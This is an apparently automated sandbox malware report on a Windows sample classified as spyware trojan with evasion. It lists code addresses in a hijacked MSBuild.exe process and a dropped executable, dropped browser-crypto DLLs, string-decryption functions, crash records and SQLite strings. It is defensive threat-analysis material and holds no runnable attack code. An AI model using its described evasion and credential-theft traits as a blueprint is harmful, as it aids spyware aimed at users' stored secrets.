Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC16E63	3_2_6CC16E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE7E10	3_2_6CBE7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF5600	3_2_6CBF5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAC670	3_2_6CBAC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC9E50	3_2_6CBC9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE3E50	3_2_6CBE3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC09E30	3_2_6CC09E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF2E4E	3_2_6CBF2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC4640	3_2_6CBC4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF77A0	3_2_6CBF77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD6FF0	3_2_6CBD6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBADFE0	3_2_6CBADFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE7710	3_2_6CBE7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB9F00	3_2_6CBB9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC150C7	3_2_6CC150C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD60A0	3_2_6CBD60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCC0E0	3_2_6CBCC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE58E0	3_2_6CBE58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBEB820	3_2_6CBEB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBF4820	3_2_6CBF4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB7810	3_2_6CBB7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBEF070	3_2_6CBEF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC8850	3_2_6CBC8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCD850	3_2_6CBCD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDD9B0	3_2_6CBDD9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAC9A0	3_2_6CBAC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE5190	3_2_6CBE5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC02990	3_2_6CC02990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1B170	3_2_6CC1B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBFB970	3_2_6CBFB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBD960	3_2_6CBBD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBCA940	3_2_6CBCA940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBCAB0	3_2_6CBBCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBA22A0	3_2_6CBA22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBD4AA0	3_2_6CBD4AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBC1AF0	3_2_6CBC1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBEE2F0	3_2_6CBEE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC1BA90	3_2_6CC1BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC12AB0	3_2_6CC12AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE8AC0	3_2_6CBE8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBE9A60	3_2_6CBE9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC153C8	3_2_6CC153C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBAF380	3_2_6CBAF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBED320	3_2_6CBED320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBBC370	3_2_6CBBC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBA5340	3_2_6CBA5340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC4ECC0	3_2_6CC4ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCAECD0	3_2_6CCAECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC5AC60	3_2_6CC5AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD16C00	3_2_6CD16C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD2AC30	3_2_6CD2AC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CDDCDC0	3_2_6CDDCDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCE6D90	3_2_6CCE6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC54DB0	3_2_6CC54DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD7AD50	3_2_6CD7AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD1ED70	3_2_6CD1ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CDD8D20	3_2_6CDD8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC5AEC0	3_2_6CC5AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCF0EC0	3_2_6CCF0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCD6E90	3_2_6CCD6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEEE70	3_2_6CCEEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD30E20	3_2_6CD30E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD2EFF0	3_2_6CD2EFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC50FE0	3_2_6CC50FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD98FB0	3_2_6CD98FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC5EFB0	3_2_6CC5EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCBEF40	3_2_6CCBEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD12F70	3_2_6CD12F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC56F10	3_2_6CC56F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD90F20	3_2_6CD90F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD568E0	3_2_6CD568E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD24840	3_2_6CD24840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCA0820	3_2_6CCA0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCDA820	3_2_6CCDA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD6C9E0	3_2_6CD6C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC849F0	3_2_6CC849F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD109B0	3_2_6CD109B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCE09A0	3_2_6CCE09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD0A9A0	3_2_6CD0A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC88960	3_2_6CC88960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCA6900	3_2_6CCA6900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCCEA80	3_2_6CCCEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCCCA70	3_2_6CCCCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCFEA00	3_2_6CCFEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD08A30	3_2_6CD08A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD56BE0	3_2_6CD56BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCF0BA0	3_2_6CCF0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC964D0	3_2_6CC964D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEA4D0	3_2_6CCEA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD7A480	3_2_6CD7A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC68460	3_2_6CC68460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB4420	3_2_6CCB4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCDA430	3_2_6CCDA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD1A5E0	3_2_6CD1A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCDE5F0	3_2_6CCDE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC445B0	3_2_6CC445B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD98550	3_2_6CD98550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCA8540	3_2_6CCA8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD54540	3_2_6CD54540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCB2560	3_2_6CCB2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCF0570	3_2_6CCF0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CC746D0	3_2_6CC746D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCAE6E0	3_2_6CCAE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEE6E0	3_2_6CCEE6E0
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D02021	10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D340C8	10_2_00D340C8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D32088	10_2_00D32088
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E1CF	10_2_00D2E1CF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5E1A8	10_2_00D5E1A8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5E132	10_2_00D5E132
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D32123	10_2_00D32123
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E272	10_2_00D2E272
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E27B	10_2_00D2E27B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D38278	10_2_00D38278
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D30488	10_2_00D30488
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E455	10_2_00D2E455
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2E527	10_2_00D2E527
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D68798	10_2_00D68798
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5E738	10_2_00D5E738
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D74988	10_2_00D74988
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D34AC8	10_2_00D34AC8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0CAF2	10_2_00D0CAF2
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D4AA47	10_2_00D4AA47
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D5AD84	10_2_00D5AD84
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D38D88	10_2_00D38D88
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D36D40	10_2_00D36D40
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D74E98	10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D76FA8	10_2_00D76FA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D70F18	10_2_00D70F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D3EF08	10_2_00D3EF08
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D3B078	10_2_00D3B078
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D371D8	10_2_00D371D8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D651A8	10_2_00D651A8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0729C	10_2_00D0729C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D633C8	10_2_00D633C8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1D39B	10_2_00D1D39B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D494C8	10_2_00D494C8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D6B778	10_2_00D6B778
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1572C	10_2_00D1572C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D71918	10_2_00D71918
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D59BA8	10_2_00D59BA8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1BB36	10_2_00D1BB36
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D13C92	10_2_00D13C92
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D37DE8	10_2_00D37DE8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D01D79	10_2_00D01D79
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D2DED8	10_2_00D2DED8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0FEF0	10_2_00D0FEF0

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Found potential string decryption / allocating functions

Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: String function: 00D4A1D8 appears 152 times
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: String function: 00D07B80 appears 49 times
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: String function: 00D39978 appears 93 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CDD09D0 appears 146 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CC79B10 appears 32 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CC73620 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 004104E7 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CBDCBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CBE94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6CDDDAE0 appears 35 times
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: String function: 008F7B80 appears 49 times

One or more processes crash

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6532 -s 288

Sample file is different than original file name gathered from version info

Source: f1r6P3j3g7.exe, 00000000.00000000.1664311173.0000000000980000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameproquota.exej% vs f1r6P3j3g7.exe
Source: f1r6P3j3g7.exe	Binary or memory string: OriginalFilenameproquota.exej% vs f1r6P3j3g7.exe

Uses 32bit PE files

Source: f1r6P3j3g7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: f1r6P3j3g7.exe	Static PE information: Section: .data ZLIB complexity 0.9919195713141026
Source: KEGIDHJKKJ.exe.3.dr	Static PE information: Section: .data ZLIB complexity 0.9912368881118881
Source: a43486128347[1].exe.3.dr	Static PE information: Section: .data ZLIB complexity 0.9912368881118881

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@19/40@13/4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_6CC07030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6CC07030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00411807

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\GKI36XO7.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6532
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess908
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2664

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\ProgramData\KEGIDHJKKJ.exe	Command line argument: MZx	10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe	Command line argument: MZx	10_2_00D02021
Source: C:\ProgramData\KEGIDHJKKJ.exe	Command line argument: MZx	10_2_00D02021

Source: f1r6P3j3g7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: MSBuild.exe, MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.3.dr, sql[1].dll.3.dr, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
